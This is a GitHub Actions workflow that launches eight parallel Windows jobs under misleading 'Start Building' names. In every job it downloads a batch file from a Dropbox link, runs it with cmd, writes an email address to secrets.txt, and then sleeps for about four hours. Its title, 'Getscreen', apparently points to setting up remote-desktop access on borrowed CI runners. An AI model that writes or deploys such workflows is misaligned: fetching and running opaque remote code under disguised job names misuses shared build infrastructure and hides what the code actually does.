name: Getscreen new

on:
  workflow_dispatch:

jobs:
  build1:
    name: Start Building 1...
    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=lewanayamina@proton.me" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: Start-Sleep -Seconds 14600

  build2:
    name: Start Building 2...
    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=lewanayamina@proton.me" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: Start-Sleep -Seconds 14600
        
  build3:
    name: Start Building 3...
    runs-on: windows-latest
    timeout-minutes: 9999
    

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=lewanayamina@proton.me" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: Start-Sleep -Seconds 14600
        
  build4:
    name: Start Building 4...
    runs-on: windows-latest
    timeout-minutes: 9999
    

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=lewanayamina@proton.me" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: Start-Sleep -Seconds 14600
        
  build5:
    name: Start Building 5...
    runs-on: windows-latest
    timeout-minutes: 9999
    

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=lewanayamina@proton.me" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: Start-Sleep -Seconds 14600
        
  build6:
    name: Start Building 6...
    runs-on: windows-latest
    timeout-minutes: 9999
    

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=lewanayamina@proton.me" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: Start-Sleep -Seconds 14600
        
  build7:
    name: Start Building 7...
    runs-on: windows-latest
    timeout-minutes: 9999
    

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=lewanayamina@proton.me" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: Start-Sleep -Seconds 14600
        
  build8:
    name: Start Building 8...
    runs-on: windows-latest
    timeout-minutes: 9999
    

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=lewanayamina@proton.me" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: Start-Sleep -Seconds 14600
        
